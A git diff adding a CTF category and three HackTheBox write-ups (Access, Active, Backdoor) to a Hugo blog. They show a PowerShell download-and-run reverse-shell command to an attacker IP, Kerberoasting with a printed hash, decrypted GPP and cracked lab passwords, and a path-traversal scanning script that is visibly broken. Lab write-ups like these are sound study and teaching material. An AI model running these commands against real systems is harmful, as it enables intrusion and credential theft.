add: writeup-ctf

.gitignore

@@ -5,3 +5,4 @@ public
 #others
 node_modules
 .hugo_build.lock
+*.lock

config/_default/menus.en.toml

@@ -43,6 +43,12 @@
   pageRef = "categories/security"
   weight = 10
 
+[[main]]
+  name = "Writeup CTF"
+  parent = "Categories"
+  pageRef = "categories/writeup-ctf"
+  weight = 10
+
 [[main]]
   name = "About"
   pageRef = "about"

content/categories/_index.md

@@ -31,3 +31,13 @@ layout: "categories"
         <button class="bg-transparent hover:text-primary-500 prose dark:prose-invert font-semibold hover:text-white py-2 px-4 border border-primary-500 hover:border-transparent rounded">Show More</button>
     </a>
 </div>
+
+---
+
+{{< list title="Writeup CTF" cardView=true limit=3 where="Type" value="writeup-ctf" >}}
+
+<div class="mt-10 flex justify-center">
+    <a href="writeup-ctf">
+        <button class="bg-transparent hover:text-primary-500 prose dark:prose-invert font-semibold hover:text-white py-2 px-4 border border-primary-500 hover:border-transparent rounded">Show More</button>
+    </a>
+</div>

content/categories/writeup-ctf.md

@@ -0,0 +1,11 @@
+---
+title: "Writeup CTF"
+draft: false
+slug: "writeup-ctf"
+layout: "simple"
+showWordCount: false
+showReadingTime: false
+showDate: false
+---
+
+{{< list title=" " cardView=true limit=99 where="Type" value="writeup-ctf" >}}

content/writeup-ctf/writeup-access-htb/index.md

@@ -0,0 +1,106 @@
+---
+title: "Writeup - Access (HTB)"
+date: 2022-04-15
+slug: "writeup-access-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.98
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP
+- 23/tcp : telnet
+- 80/tcp : HTTP web server (httpd 7.5)
+
+![](img/image-2.webp)
+
+## Exploit
+
+In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`.
+
+![](img/image-3.webp)
+
+There are 2 folders in which we find the following files:
+- Access Control.zip
+- backup.mdb
+
+{{< alert >}}
+Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`:
+{{< /alert >}}
+
+![](img/image-4.webp)
+
+In the different tables I find `auth_user`, interesting there could be credencial for an account.
+
+![](img/image-5.webp)
+
+I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive.
+
+In the archive I find a `.pst`. To read its contents I use the following command:
+
+
+```bash
+readpst Access\ Control.pst -M
+```
+Among the different mails I find the following content:
+
+![](img/image-6.webp)
+
+A new password ! I try to connect to the telnet server with these credencials.
+
+![](img/image-7.webp)
+
+I now have a shell as `security` and I can get the first flag.
+
+![](img/image-8.webp)
+
+## Privilege escalation
+
+After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`.
+
+![](img/image-9.webp)
+
+I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file.
+
+
+```bash
+Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
+```
+I then launch a web server on my machine.
+
+
+```bash
+python3 -m http.server 80
+```
+Then I download/run the script with the admin runas.
+
+
+```bash
+runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
+```
+I now have a reverse shell as Administrator!
+
+![](img/image-10.webp)
+
+So I can get the last flag back.
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not let the `anonymous` user enable in FTP server configuration
+- Do not store sensitive information in a folder accessible by several people via FTP/web/...
+- Do not give runas Administrator permission to a user

content/writeup-ctf/writeup-active-htb/index.md

@@ -0,0 +1,125 @@
+---
+title: "Writeup - Active (HTB)"
+date: 2022-03-25
+slug: "writeup-active-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Active](https://app.hackthebox.com/machines/Active) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.100
+```
+Many TCP ports are discovered:
+
+![](img/image-1.webp)
+
+## Exploit
+
+First of all, let's make an enumeration of the users/shares with the following command:
+
+
+```bash
+enum4linux -a 10.10.10.100
+```
+![](img/image-2.webp)
+
+You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let's see what we can find inside. To connect I use the following command:
+
+
+```bash
+smbclient --no-pass //10.10.10.100/Replication
+```
+In the share there are two folders, one of which is of particular interest to me: `Policies`. In this folder I find the file `Groups.xml` which contains information allowing the exploitation of the machine.
+
+[Exploiting GPP SYSVOL (Groups.xml) | VK9 Security](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/)
+
+![](img/image-3.webp)
+
+And indeed in the file I find 2 important information: `name` and `cpassword`.
+
+
+```bash
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
+</Groups>
+```
+As explained in the article above it is possible to decrypt the `cpassword` with the `gpp-decrypt` command.
+
+![](img/image-4.webp)
+
+We can therefore deduce the following credencials:
+
+user : active.htb\SVC\_TGS  
+pass : GPPstillStandingStrong2k18
+
+I now look at the permissions I have with these credentials:
+
+![](img/image-5.webp)
+
+I now have access to the share `Users`, let's see what's inside:
+
+![](img/image-6.webp)
+
+I quickly find the first flag on the desktop of the SVC-TGS user:
+
+![](img/image-7.webp)
+
+## Privilege escalation
+
+To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting.
+
+
+> Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. [complx.com](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/#:~:text=Kerberoasting%20is%20a%20post%2Dexploitation,poor%20service%20account%20password%20hygiene.)
+
+To perform the hashes extraction I will use the following command:
+
+
+```bash
+impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.10.10.100 -outputfile output.txt -request
+```
+![](img/image-8.webp)
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ cat output.txt 
+$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b8d16f6a494a6a06a7954e6a89f01ae1$2c1fc9a4a13479b7c31b2f76a8d6e9b05d97f7c6557848ad2d87960e7c89104568eb3f0ec8eedb7ab3636cca2209ed5b1582c14da207c6dab05f8ef6fce1047075d6d5edf2386f87e85576d90c9cfbac94044dceab2a4dc70c2751b7d353927781444a3e852b0bd795ca6975fb95c55fa8a49787bcb4ab0e02beee3edcb9df5d5fe53600aa0d0da1b22aae42649eedfff67ee00a2464a3fcbdef110cbf8eadce8f715fe620b5580154442099ad3771ec32c585c72a9e2f7d58d43f7344844d3b17a3cbc4b3c143af7d86343c51d945edc429fce49ee91c90dce2cad6bd4f17f6d210ce8055f49d69cee83aeca19f43cf465c6ab4b1d9c7bc575ef95a43aa235aa8adda00f65db41895396cf4727a05b367e779d126a06ca0d3319e6ff06cc127bf95d833ee54158ce905a1fd0e3b4de2e20e31a336fd6d5f0bf2b67660ddfc22106773a069f63c4d5ffa7c0178123a68b0b63a937df8783e2fd581f61539958aea7493035b8dbabfbf2775e70fd67440df8f9bc07d47d172d87ad717c8a27e752317e4d21ce2a3f403bfa6e6574ab10895d4d4cecb4f4feb1e1c718ce7b9c338a5ca5749374af941665174ff4246aed685b3d095b45f916accaf0a17656b4115d62d60dbb684eecec1235ea79645b12d957897c55c0f21c650ca9cc257bfaaa9ffef0b60edf265f9456a0db411e40e6b4ece00e6a143b40a5de5c833e5cb9708040e0f56b341bdc2ddc2ea1acf38b966d0583a027709c744a03fa600d9d943b3d7ffe9de5f591ac5ad7cd6158a918b99d6b15155099428a441f2984e6f82d2bbb1e5dc16c77ef6cc3604275e93d76d63fe2465331146c8358cf1a95413c502bd02a070c1caad48287720364005117067d5b04a4dc4ae3220443c400a4f4083b9110cb20783e5bf3412dcfbaff12e82f282b7749c412a4d52513814da147f0a40ad058f49c0216e980436af8455f6b1cecd4e6ace6877baf640fb8fadb3e92177343581aa96fbab2901b9226407273ab8568c1a2c7600493b741b809f817aa18d521f5cda1571461b67159a46272f51160f5790fa919019b8facbb70777f948654d895284992c0db9da7b87df843324fc43165c63d504f78b770f2612b9c88c598bc1dbd80d593f738d965b5593cd25fc41a53e1bf9f8095e99ef84aeac8c7426ba36af8aa036dac6440cb2412d5c0c7b626630931f0aee1b0dd469bc94f17f5ebed590bed26c6865916d0213d9f411723b4efb09f3f0d5043036
+```
+Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command:
+
+
+```bash
+john output.txt --wordlist=Documents/wordlist/rockyou.txt
+```
+![](img/image-9.webp)
+
+After a few seconds, John gives me the password for the administrator account: `Ticketmaster1968`.
+
+I can verify that the credentials work well with `smbmap` :
+
+![](img/image-10.webp)
+
+Then I can create a reverse shell with `psexec`:
+
+![](img/image-11.webp)
+
+I now have a shell as `NT authority` authority and I can get the last flag.
+
+
+```bash
+C:\Users\Administrator\Desktop> more root.txt
+7255a7f4f435814c28a5e8b51aabb4b4
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave the `Policies` file accessible to everyone
+- Disable SMB anonymous access
+- Use a strong password for the administrator account

content/writeup-ctf/writeup-backdoor-htb/index.md

@@ -0,0 +1,128 @@
+---
+title: "Writeup - Backdoor (HTB)"
+date: 2022-04-19
+slug: "writeup-backdoor-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site.
+
+# Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.125
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : web server (Apache 2.4.41)
+- 1337/tcp : ?????
+
+We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like.
+
+![](img/image-2.webp)
+
+# Exploit
+
+After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws:
+
+![](img/image-3.webp)
+
+Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command:
+
+
+```bash
+wpscan --url http://backdoor.htb --plugin-detection aggressive
+```
+![](img/image-4.webp)
+
+There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-. 
+
+So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists.
+
+
+```bash
+import requests
+
+for i in range(0,1000):
+    url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc>
+    answer=requests.get(url)
+    lg=len(answer.text)
+    if(leng>82):
+        if '1337' in resp.text:
+            print("%d %s ",lg, answer.text)
+```
+After running the script, we find 2 services:
+
+![](img/image-5.webp)
+
+These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process.
+
+Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB :
+
+[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539)
+
+After generating a payload with msfvenom, I run the script :
+
+![](img/image-6.webp)
+
+I now have a shell on the remote machine, I can get the first flag.
+
+![](img/image-7.webp)
+
+# Privilege escalation
+
+First I try to find the SUID files. For that I use the following command:
+
+
+```bash
+find / -perm -u=s -type f 2>/dev/null
+```
+![](img/image-8.webp)
+
+There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command:
+
+![](img/image-9.webp)
+
+And indeed there is a process running. But not just any process, a root shell with the options -dmS :
+
+- -d : detache de screen when started
+- -m : ignore the $STY environment variable, creation of a new session is enforced
+- -S : When creating a new session, this option can be used to specify a meaningful name
+
+So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell.
+
+To connect to the detached screen we need to use the following command:
+
+
+```bash
+screen -x [name]/[user]
+```
+But before connecting we will have to define the variable $TERM, to do this I use the following command:
+
+
+```bash
+export TERM=screen
+```
+I can now connect to the root screen with the following command:
+
+
+```bash
+screen -x root/root
+```
+I now have access to a root shell and can retrieve the last flag.
+
+![](img/image-10.webp)
+
+# Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update Wordpress plugin
+- Update GDB server
+- Do not run screen as root with the -m variable